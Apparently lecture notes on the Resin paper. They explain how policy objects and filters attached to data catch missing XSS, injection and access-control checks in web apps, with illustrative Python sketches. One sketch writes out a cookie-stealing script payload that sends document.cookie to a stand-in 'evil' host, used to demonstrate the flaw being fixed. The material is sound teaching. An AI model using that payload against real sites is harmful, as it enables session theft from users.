Resin
=====

What kinds of problems is this paper trying to address?
  Threat model:
    trusted: hardware / OS / language runtime / DB / app code
    untrusted: external inputs (users, whois servers)
    non-goals: buffer overflows, malicious apps
  Programming errors: missing security checks in application code
    sanitizing user inputs to prevent code injection
    calling access-control functions for sensitive data
      e.g. a protected wiki page; a user's password

Example: one web server, multiple users
  Users interact with each other:
    reading posts in a web forum
    avatar URL / uploaded post content / profile / signature
  Attacker's plan: inject JS code / forge requests
    Victim's browser sees this code in the HTML page and runs it.
  What kind of code could the attacker inject?
    steal the cookie
    transfer credits
    perform ACL-privileged operations (as admin)
  Why doesn't the browser's same-origin policy protect the cookie?
    As far as the browser is concerned, the code came from the server's origin.
  Lower level: the zookws web server was vulnerable
    http://.../ returns: File not found: /

A similar problem: whois injection
  Admin views logs: user, IP, domain.
  A malicious whois server supplies part of that data.
  Problems arise if the programmer forgets to quote external inputs.

A different kind of problem: access-control checks
  Might have protected pages in a wiki, but forget to call the ACL function.
  Example: hotcrp's password disclosure
    Typical web site: sends password reminders by email.
    Email-preview mode displays emails instead of sending them.
    Turns out to display password reminders in the requesting user's browser.
    Kind of like the confused deputy problem: no single module is really at fault.

Why are the checks missing?
  Lots of places in the code where they need to be performed.
  Think of the application as a black box with lots of inputs and outputs.
  Suppose that for a given output, only some inputs were OK.
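A minimal sketch of the forum XSS problem above (hypothetical forum code, not from the paper): the same output path rendered with and without the escaping check the programmer must remember everywhere.

```python
import html

def render_post(author, body):
    # BUG: body is interpolated into HTML without escaping, so a post
    # containing <script>...</script> runs in every reader's browser.
    return f"<p><b>{author}</b>: {body}</p>"

def render_post_escaped(author, body):
    # The fix -- but the programmer must remember it on *every* output path.
    return f"<p><b>{html.escape(author)}</b>: {html.escape(body)}</p>"

evil = "<script>document.location='http://evil/?c='+document.cookie</script>"
print(render_post("alice", evil))          # script tag survives: XSS
print(render_post_escaped("alice", evil))  # escaped to inert text
```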
  For example: user inputs in a SQL query must be sanitized, but the
  app's own data need not be.
  Hard to tell where an output's data came from, so programmers try to
  do checks on all possible paths -- and forget them on some paths from
  input to output.
  Plug-in developers may be unaware of the security plan.

What's the plan to prevent these?
  Think of the checks as being associated with data flows (input -> output).
  Associate checks with data objects, like user input or password strings.
  Perform checks whenever data gets used in some interesting way.

What does Resin provide?
  hotcrp data: password
  [ diagram from figure 1 ]
  Policy objects
    Contain code to implement the policy for their data.
    hotcrp: only email the password to the user or the PC chair.
    What methods does the programmer have to implement in a policy object?
      export_check(context)
      merge [optional]
  Filter objects
    Data-flow boundaries: channels with contexts (HTTP, email, ...).
    Provided by default by Resin for most external channels.
    Invoke export_check if possible.
  Data tracking

How does this work?
  Assumes a language runtime.
    Python and PHP have a byte-code representation, sort of like Java.
  Resin tags strings and integers with a policy object.
  Changes the implementation of operations that manipulate data.
  Why only tag strings and integers?  What about other things?
  What kinds of operations propagate?
    Why not propagate across "covert" or "implicit" channels?
  Why byte-level tracking?
  What happens when data items are combined?
    common: concatenating strings (automatic via byte-level tracking)
    rare: adding integers

What are all of the uses for filter objects?
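The policy-object mechanism described above might look like this sketch in plain Python (hypothetical API and names; real Resin attaches policies inside the interpreter, and the PC-chair address here is invented):

```python
# Sketch of Resin-style policy objects: data carries a policy, and an
# output-channel filter invokes export_check before data leaves the app.

class PasswordPolicy:
    """Policy for a hotcrp password string."""
    def __init__(self, owner_email):
        self.owner_email = owner_email

    def export_check(self, context):
        # context describes the output channel, e.g. an email recipient.
        # "pcchair@example.org" stands in for the PC chair's address.
        if context.get("channel") == "email" and \
           context.get("to") in (self.owner_email, "pcchair@example.org"):
            return  # OK: emailing the password to its owner or the PC chair
        raise PermissionError("password leaving via disallowed channel")

class Tainted(str):
    """A string carrying policy objects (Resin tags real strings this way)."""
    def __new__(cls, value, policies):
        s = super().__new__(cls, value)
        s.policies = list(policies)
        return s

def email_filter(data, context):
    # A default channel filter: run export_check for every attached policy.
    for p in getattr(data, "policies", []):
        p.export_check(context)
    return str(data)

pw = Tainted("s3cret", [PasswordPolicy("alice@example.org")])
email_filter(pw, {"channel": "email", "to": "alice@example.org"})  # allowed
```

The point of the design: the check lives with the data, so it runs no matter which code path carried the password to the channel.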
Uses for filter objects:
  Default filters for external boundaries: sockets, pipes, HTTP, email.
  Persistent serialization
    files: extended attributes
    database: extra columns for policies, SQL rewriting
    example: writing a password to a file or the DB
  Code imports: the interpreter's input is yet another kind of channel.
  Write access control
    Persistent filters on FS objects like files and directories.
    Almost a different kind of check: tied to an external object, not to data.
  Propagation rules for functions: sha1(), strtoupper(), ...

How would you use Resin to prevent missing checks?
  hotcrp cross-site scripting: profile
    An UntrustedData policy, plus a filter that calls strip and removes the policy?
    Or: define UntrustedData and JSSanitized, both with empty export_check.
      Input is tagged UntrustedData.
      The strip function attaches JSSanitized.
      The output filter checks: a string carrying UntrustedData must
      also carry JSSanitized.
    Alternative: UntrustedData policy only; the filter itself parses and
    sanitizes strings.

Does this system actually work?
  Two versions of Resin, one for Python and one for PHP.
  Prevented known bugs in real apps.
  Prevented unknown bugs in real apps too.
  Few different kinds of bugs (ACL, XSS, SQL injection, directory traversal, ...).
  Is it possible to forget checks with Resin?
  What does Resin provide / guarantee?
  Are there potential pitfalls with Resin's assertions?
  How much code is required to write these assertions?  Why?
  How specific are the assertions to the bug you want to prevent?  Why?
  How did they prevent the myphpscripts login library bug?

What's the cost?
  Need to deploy a new PHP/Python interpreter.
  Need to write some assertions (policy objects?).
  Runtime overheads: memory to store policies, CPU time to track them.
  Major cost: serializing policies to SQL and the file system.
    Could that be less?  E.g., avoid storing the email twice in hotcrp?

How else can you avoid these missing-check problems?
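The UntrustedData/JSSanitized scheme for the hotcrp XSS bug can be sketched as follows (hypothetical classes and a toy tag-stripping sanitizer; real Resin propagates these tags byte-by-byte in the runtime):

```python
import re

# Empty policies act as markers: the HTTP output filter rejects any
# untrusted string that has not passed through the sanitizer.

class UntrustedData:   # attached to all external input
    pass

class JSSanitized:     # attached by the strip/sanitize function
    pass

class Tagged(str):
    def __new__(cls, value, policies=()):
        s = super().__new__(cls, value)
        s.policies = list(policies)
        return s

def strip_tags(s):
    clean = re.sub(r"<[^>]*>", "", s)   # toy sanitizer: drop HTML tags
    return Tagged(clean, getattr(s, "policies", []) + [JSSanitized()])

def http_output_filter(s):
    pols = [type(p) for p in getattr(s, "policies", [])]
    if UntrustedData in pols and JSSanitized not in pols:
        raise ValueError("untrusted data sent to browser without sanitizing")
    return str(s)

post = Tagged("<script>evil()</script>", [UntrustedData()])
http_output_filter(strip_tags(post))    # allowed: sanitized on the way out
```

Note that the assertion is deliberately loose: it does not say *how* to sanitize, only that every browser-bound path must have gone through strip_tags.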
Alternatives:
  IFC does data tracking in some logical sense.
    Trade-off: redesign/rewrite your app around some checks.
    Hard to redesign around multiple checks, or to add a check later.
  Java stack inspection
    Can't automatically perform checks for things that are off the stack.
    Can check that a file is being read through a sanitizing/ACL-checking function.
    Crimps the programmer's style, but in theory possible.
  Express some of these checks in the type system.
    Maybe have a special kind of UntrustedString vs. SafeString,
    and conversely SQLString and HTMLString, which get used for output.
    Special conversion rules between them.
    Could even do static checks for these data flows.
    For password disclosure / ACL checks: maybe a delayed-check string?
      When about to send out the string, tell it where you're sending it.
      Almost like Resin.
    Design problem with using the type system: policies are intertwined
    with code throughout the app.
      To add a new check, need to change types everywhere.
      Resin is almost like a shadow type system.

Could you apply Resin to other applications, or other environments?
  Different languages?  Different machines (a cluster of web servers)?
  No language runtime?  Untrusted/malicious code?
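The type-system alternative above can be sketched like this (hypothetical classes, illustrating the idea rather than any real library): the only way to construct an HTMLString from an UntrustedString is through the sanitizer, so a forgotten check becomes a type error at the output channel instead of a silent bug.

```python
import html

_HTML_OK = object()   # private token: forces construction via sanitize_html

class UntrustedString:
    def __init__(self, value):
        self.value = value

class HTMLString:
    def __init__(self, value, _token=None):
        assert _token is _HTML_OK, "construct HTMLString via sanitize_html()"
        self.value = value

def sanitize_html(u):
    # The sole conversion rule from untrusted data to browser-bound data.
    return HTMLString(html.escape(u.value), _token=_HTML_OK)

def send_page(body):
    # The output channel accepts only HTMLString, never raw strings.
    if not isinstance(body, HTMLString):
        raise TypeError("output channel only accepts HTMLString")
    return body.value

send_page(sanitize_html(UntrustedString("<script>x</script>")))  # allowed
```

This shows the trade-off the notes mention: the check is hard to forget, but every function between input and output must now mention these types, whereas Resin's tags ride along invisibly.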